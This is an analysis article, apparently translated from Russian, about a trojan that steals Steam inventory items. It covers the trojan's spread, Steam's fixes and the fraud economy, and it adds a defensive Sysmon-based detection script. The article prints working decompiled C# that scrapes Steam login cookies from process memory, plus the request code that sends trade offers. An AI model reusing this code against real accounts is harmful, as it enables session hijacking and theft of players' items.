I was prompted to write this article by the publication "A Trojan that steals items from Steam inventories".
My article covers:
1) The history of its appearance and spread in Runet;
2) The history of Steam's struggle with this malware;
3) From what do the fraudsters make their profit?
4) What is Steam doing about these frauds?
The article contains no full source code and no links to where it can be obtained or bought. Those interested, welcome under the cut.
The history of its appearance and spread in Runet
Who the original author of this trojan was is unknown; the first mentions appeared in America at the beginning of this year. In Runet the trojan appeared and began to spread actively only in mid-to-late summer.
The program and its source code appeared in early August on a popular "cheat" portal. Two friends found the built and packed trojan, noticed that it was written in C#, and managed to pull out rather confusing but working source code. Then the builder was compiled and posted on the portal, and some time later the source itself was rewritten into human-readable form and published. From that moment on, mentions of it could be found everywhere: only on a very lazy and inactive forum could you fail to find, if not a copy of the working source, then at least someone selling a finished "build".
General scheme of operation:
Two cookies, SteamLogin and SteamLoginSecure, are regularly torn out of the Steam process:
```csharp
WinApis.SYSTEM_INFO sYSTEM_INFO = default(WinApis.SYSTEM_INFO);
while (sYSTEM_INFO.minimumApplicationAddress.ToInt32() == 0)
{
    WinApis.GetSystemInfo(out sYSTEM_INFO);
}
IntPtr minimumApplicationAddress = sYSTEM_INFO.minimumApplicationAddress;
long num = (long)minimumApplicationAddress.ToInt32();
List<string> list = new List<string>();
// Locate the Steam client: the "steam" process that has steamclient.dll loaded.
Process[] array = array = Process.GetProcessesByName("steam");
Process process = null;
for (int i = 0; i < array.Length; i++)
{
    try
    {
        foreach (ProcessModule processModule in array[i].Modules)
        {
            if (processModule.FileName.EndsWith("steamclient.dll"))
            {
                process = array[i];
                break;
            }
        }
    }
    catch { }
}
if (process != null)
{
    // 1040 = 0x410 = PROCESS_QUERY_INFORMATION | PROCESS_VM_READ
    IntPtr handle = WinApis.OpenProcess(1040u, false, process.Id);
    WinApis.PROCESS_QUERY_INFORMATION pROCESS_QUERY_INFORMATION = default(WinApis.PROCESS_QUERY_INFORMATION);
    IntPtr intPtr = new IntPtr(0);
    // Walk the committed, read/write regions of the process and search them for cookie values.
    while (WinApis.VirtualQueryEx(handle, minimumApplicationAddress, out pROCESS_QUERY_INFORMATION, 28u) != 0)
    {
        if (pROCESS_QUERY_INFORMATION.Protect == 4u && pROCESS_QUERY_INFORMATION.State == 4096u)
        {
            byte[] array2 = new byte[pROCESS_QUERY_INFORMATION.RegionSize];
            WinApis.ReadProcessMemory(handle, pROCESS_QUERY_INFORMATION.BaseAdress, array2, pROCESS_QUERY_INFORMATION.RegionSize, out intPtr);
            string @string = Encoding.UTF8.GetString(array2);
            MatchCollection matchCollection = new Regex("7656119[0-9]{10}%7c%7c[A-F0-9]{40}", RegexOptions.IgnoreCase).Matches(@string);
            if (matchCollection.Count > 0)
            {
                foreach (Match match in matchCollection)
                {
                    if (!list.Contains(match.Value))
                    {
                        list.Add(match.Value);
                    }
                }
            }
        }
        num += (long)((ulong)pROCESS_QUERY_INFORMATION.RegionSize);
        if (num >= 2147483647L)
        {
            break;
        }
        minimumApplicationAddress = new IntPtr(num);
    }
    this.ParsedSteamCookies = list;
}
```
Next, this data is substituted into a web request that is sent to the server to obtain the session, i.e. authorization. After that the program theoretically has full access to all functions of the Steam client. Getting the list of items and sending a trade offer was described in a previous article (the code given in that article for sending an offer does not work).
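From the defender's side, the access mask the stealer passes to OpenProcess above, 1040 decimal (0x410), is PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, and a foreign process opening steam.exe with read access is the host-level signal to alert on. The script below is an added example, not code from the article or from Steam: it runs that check over constructed Sysmon Event ID 10 (ProcessAccess) records; the allowlist of legitimate source images is an assumption to be tuned per environment.

```python
"""Flag non-allowlisted processes that open steam.exe with PROCESS_VM_READ.

Input records mimic the fields of Sysmon Event ID 10 (ProcessAccess):
SourceImage, TargetImage, GrantedAccess. All sample events are constructed.
"""
from typing import Dict, List

PROCESS_VM_READ = 0x10            # read access to the target's memory
PROCESS_QUERY_INFORMATION = 0x400  # 0x410 together: the mask seen in the stealer

# Hypothetical allowlist: images that legitimately read steam.exe memory.
ALLOWED_SOURCES = {
    r"c:\program files (x86)\steam\steam.exe",
    r"c:\windows\system32\csrss.exe",
}

SAMPLE_EVENTS: List[Dict[str, str]] = [  # constructed sample telemetry
    {"SourceImage": r"C:\Users\user\AppData\Roaming\skins.exe",
     "TargetImage": r"C:\Program Files (x86)\Steam\steam.exe",
     "GrantedAccess": "0x410"},   # QUERY_INFORMATION | VM_READ from an odd path
    {"SourceImage": r"C:\Program Files (x86)\Steam\steam.exe",
     "TargetImage": r"C:\Program Files (x86)\Steam\steam.exe",
     "GrantedAccess": "0x1FFFFF"},  # Steam touching itself: allowlisted
    {"SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Program Files (x86)\Steam\steam.exe",
     "GrantedAccess": "0x1000"},  # PROCESS_QUERY_LIMITED_INFORMATION only
]


def is_suspicious(event: Dict[str, str]) -> bool:
    """True when a non-allowlisted image gets VM_READ on steam.exe."""
    target = event["TargetImage"].lower()
    if not target.endswith("\\steam.exe"):
        return False
    granted = int(event["GrantedAccess"], 16)
    if not granted & PROCESS_VM_READ:
        return False
    return event["SourceImage"].lower() not in ALLOWED_SOURCES


def find_memory_readers(events: List[Dict[str, str]]) -> List[str]:
    """Return the SourceImage of every event that should raise an alert."""
    return [e["SourceImage"] for e in events if is_suspicious(e)]


if __name__ == "__main__":
    for image in find_memory_readers(SAMPLE_EVENTS):
        print("ALERT: steam.exe memory read by", image)
```

The same rule expressed as a Sysmon ProcessAccess filter on TargetImage plus GrantedAccess gives you the event stream; the allowlist is what keeps Steam's own handles and overlay tooling from paging you.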
The history of Steam's struggle with this malware
Since August, Steam has made two attempts to combat this trojan, although the second is hardly a real fight; rather, it was a side effect of some update.
Fix one. Early September
As I mentioned above, two cookies are parsed from the client, but one of them (SteamLoginSecure) was enough to send an offer (a proposal to exchange items with the attacker). Steam's fix was that both are now required. As you might expect, this "problem" in the stealer's operation was found by the same craftsmen in less than a day, and a couple of days later another actor (not me) had already posted the revised source code publicly (though he now regrets the deed).
Fix two. November 17
Honestly, it is not known why, but Steam decided to add one parameter to the request that sends an offer:
```csharp
private string sentItems(string sessionID, string items, string[] Offer, string message = "")
{
    return SteamHttp.SteamWebRequest(this.cookiesContainer, "tradeoffer/new/send", string.Concat(new string[]
    {
        "sessionid=", sessionID,
        "&partner=", Offer[0],
        "&serverid=1",   // the parameter added by the second fix
        "&tradeoffermessage=", Uri.EscapeDataString(message),
        "&json_tradeoffer=", Uri.EscapeDataString(string.Format(
            "{5}\"newversion\":true,\"version\":2,\"me\":{5}\"assets\":[{3}],\"currency\":[],\"ready\":false{6},\"them\":{5}\"assets\":[],\"currency\":[],\"ready\":false{6}{6}",
            new object[] { sessionID, Offer[0], message, items, Offer[2], "{", "}" })),
        "&trade_offer_create_params=", Uri.EscapeDataString(string.Format("{0}\"trade_offer_access_token\":\"{2}\"{1}", "{", "}", Offer[2]))
    }), "tradeoffer/new/?partner=" + Offer[1] + "&token=" + Offer[2]);
}
```
Specifically, the "serverid=1" parameter. Why it is needed and why it was added is a question for the Steam developers; I could not find any other requests where it might have been used.
That said, explaining Steam's "lazy" fixes is quite simple.
From what do the fraudsters (and Steam!) make a profit?
All the in-game valuables that scammers obtain are sold at a reduced price on the marketplace. Here I want to remind you that Steam takes 5% of every transaction on the marketplace, and the developer of the game whose item was sold takes another 10%. Considering that the developer of the most popular games with items and the Steam service are both Valve, it is quite logical that they are in no hurry with a fix, receiving another 15% from every item sold.
Then the fraudsters withdraw the money from Steam in various ways. Since this cannot be done directly, they sell things that have value within the Steam service itself, for example keys or games (as far as I know, they get about 50-65 cents per dollar).
What is Steam doing about these scams?
It takes up to 7 days to lock an account (more precisely, to block buying, selling and trading on it) that the stolen items are dumped into. During this time the attackers usually manage to dispose of the received items and withdraw the funds from the account. Once an account is blocked, nothing can be withdrawn from it; at most you can play the games that are on it.
I must say that Steam does have a practice of returning stolen items if they were not sold on the marketplace. But, for instance, with Russian-language support it took a month:

Epilogue
I did not distribute it myself. All information is taken from people who develop or distribute it. The prices for this software are quite modest: 500-1000 rubles for the program with the receiving account hard-coded into it. The source costs from 3.5k rubles upwards, depending on whether it is bought from the developer or from a student who bought it and now resells it. At the moment I know of about 4 different developers; however, their products are virtually identical.
And finally. The best antiviruses at the moment at detecting such programs are Avira, Kaspersky and ESET NOD32. They detect fresh and fairly well obfuscated/packed versions of the trojan, though not always. The rest take quite a long time to react. Even simple obfuscation of .NET applications confuses most antiviruses.